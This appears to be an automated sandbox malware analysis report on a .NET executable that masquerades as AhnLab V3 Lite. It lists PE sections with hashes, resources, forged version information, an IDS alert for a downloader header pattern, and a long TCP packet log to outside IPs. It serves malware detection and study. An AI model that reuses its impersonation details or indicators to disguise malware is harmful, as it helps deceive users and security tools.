                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbd4780x4a.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x51a92.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xbb4c80xbb6001ebc7cdc83bd53b9965814eb03fe13bbFalse0.43314683747498334data5.884257111238239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xbe0000x51a920x51c0053a2d24ab7a455b5a45a279daa02173cFalse0.07168625764525993data2.3529693594900842IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x1100000xc0x200fce116d4f65e50151683c0bfa9b7ade3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xbe0cc0x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.7601351351351351
                                                                  RT_ICON0xbe2180x368Device independent bitmap graphic, 16 x 32 x 24, image size 8320.7155963302752294
                                                                  RT_ICON0xbe5a40x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6826241134751773
                                                                  RT_ICON0xbea300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.5389784946236559
                                                                  RT_ICON0xbed3c0xca8Device independent bitmap graphic, 32 x 64 x 24, image size 32000.470679012345679
                                                                  RT_ICON0xbfa080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4378517823639775
                                                                  RT_ICON0xc0ad40x668Device independent bitmap graphic, 48 x 96 x 4, image size 15360.36402439024390243
                                                                  RT_ICON0xc11600x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 72960.33110687022900764
                                                                  RT_ICON0xc2e2c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.30881742738589213
                                                                  RT_ICON0xc53f80xa68Device independent bitmap graphic, 64 x 128 x 4, image size 25600.2924174174174174
                                                                  RT_ICON0xc5e840x3228Device independent bitmap graphic, 64 x 128 x 24, image size 128000.26580996884735203
                                                                  RT_ICON0xc90d00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.24244213509683515
                                                                  RT_ICON0xcd31c0x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.014139568600763382
                                                                  RT_GROUP_ICON0x10f3800xbcdata0.5797872340425532
                                                                  RT_VERSION0x10f4780x3f4data0.40711462450592883
                                                                  RT_MANIFEST0x10f8a80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain
                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  CommentsAhnLab V3 Lite Main UI Application
                                                                  CompanyNameAhnLab, Inc.
                                                                  FileDescriptionAhnLab V3 Lite Main UI Application
                                                                  FileVersion4.0.0.117
                                                                  InternalNameFtlqpnn.exe
                                                                  LegalCopyright 2018-2019 AhnLab, Inc. All rights reserved.
                                                                  LegalTrademarks
                                                                  OriginalFilenameFtlqpnn.exe
                                                                  ProductNameAhnLab V3 Lite
                                                                  ProductVersion4.0.0.117
                                                                  Assembly Version4.0.0.117
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-02-19T14:21:32.849428+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449739132.226.8.16980TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Feb 19, 2025 14:20:38.884840965 CET4973180192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:38.889822960 CET804973123.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:38.889900923 CET4973180192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:38.892066002 CET4973180192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:38.897038937 CET804973123.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:39.466375113 CET804973123.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:39.469542027 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:39.469592094 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:39.469660997 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:39.484239101 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:39.484261036 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:39.521240950 CET4973180192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:40.270514965 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:40.270596027 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:40.291162968 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:40.291182995 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:40.292074919 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:40.333729982 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:40.347290039 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:40.387361050 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.250519991 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.250581026 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.250633955 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.250669003 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.250706911 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.251374006 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.251395941 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.251432896 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.251465082 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.251476049 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.302467108 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.337129116 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.337161064 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.337178946 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.337196112 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.337234974 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.337245941 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.337373972 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.337402105 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.337429047 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.337439060 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.337451935 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.338263988 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.338341951 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.338355064 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.339207888 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.339286089 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.339298964 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.340127945 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.340193987 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.340209007 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.380609035 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.423949957 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.423984051 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.424019098 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.424057007 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.424063921 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.424138069 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.424175024 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.424205065 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.424212933 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.424228907 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.424498081 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.424566031 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.424571991 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.425662041 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.425729990 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.425736904 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.425802946 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.425863028 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.425870895 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.426470041 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.426537037 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.426543951 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.427217007 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.427273035 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.427278996 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.427409887 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.427476883 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.427484989 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.474342108 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.510909081 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.510938883 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.510972977 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.511009932 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.511017084 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.511154890 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.511197090 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.511217117 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.511224031 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.511240959 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.511482000 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.511554003 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.511567116 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.512011051 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.512082100 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.512094975 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.512278080 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.512335062 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.512347937 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.512429953 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.512495995 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.512507915 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.513070107 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.513133049 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.513144970 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.513211966 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.513273001 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.513284922 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.514009953 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.514075994 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.514084101 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.514199018 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.514261007 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.514269114 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.514297962 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.514348984 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.514357090 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.515109062 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.515167952 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.515175104 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.515216112 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.515279055 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.515286922 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.515933037 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.516009092 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.516016960 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.568139076 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.598258972 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.598289013 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.598368883 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.598378897 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.598439932 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.598479033 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.598496914 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.598503113 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.598514080 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.598717928 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.598795891 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.598807096 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.599042892 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.599122047 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.599136114 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.599185944 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.599255085 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.599267960 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.599343061 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.599405050 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.599416971 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.599462986 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.599533081 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.599545002 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.599590063 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.599653959 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.599666119 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.603498936 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.603610992 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.603625059 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.603656054 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.603733063 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.603744984 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.603827000 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.603892088 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.603904963 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.603966951 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.604032040 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.604041100 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.604104042 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.604166985 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.604175091 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.604244947 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.604300976 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.604307890 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.604372025 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.604434013 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.604443073 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.604489088 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.604552031 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.604561090 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.646238089 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.688169956 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688205957 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688354969 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688364983 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.688397884 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688417912 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688426971 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.688467979 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.688473940 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688591003 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688648939 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.688657045 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688745975 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688802004 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.688808918 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688883066 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.688945055 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.688956022 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689006090 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689075947 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.689084053 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689127922 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689196110 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.689203024 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689258099 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689321995 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.689330101 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689371109 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689421892 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.689429998 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689512014 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689572096 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.689579964 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689662933 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689723015 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.689730883 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689788103 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689848900 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.689857006 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689910889 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.689965963 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.689974070 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.690030098 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.690092087 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.690099955 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.690154076 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.690215111 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.690222979 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.690273046 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.690332890 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.690340042 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.740087032 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.771975994 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772007942 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772077084 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.772113085 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.772120953 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772185087 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772253990 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.772262096 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772320986 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772377968 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.772384882 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772479057 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772537947 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.772545099 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772625923 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772684097 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.772691011 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772768974 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772830963 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.772838116 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772893906 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.772981882 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.772989035 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773025990 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.773041010 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773096085 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.773102999 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773195982 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773253918 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.773261070 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773343086 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773408890 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.773416042 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773489952 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773555994 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.773565054 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773626089 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773686886 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.773694992 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773771048 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773829937 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.773838043 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773891926 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.773948908 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.773955107 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.774019957 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.774090052 CET49732443192.168.2.423.237.50.106
                                                                  Feb 19, 2025 14:20:41.774096012 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.774148941 CET4434973223.237.50.106192.168.2.4
                                                                  Feb 19, 2025 14:20:41.774209976 CET49732443192.168.2.423.237.50.106
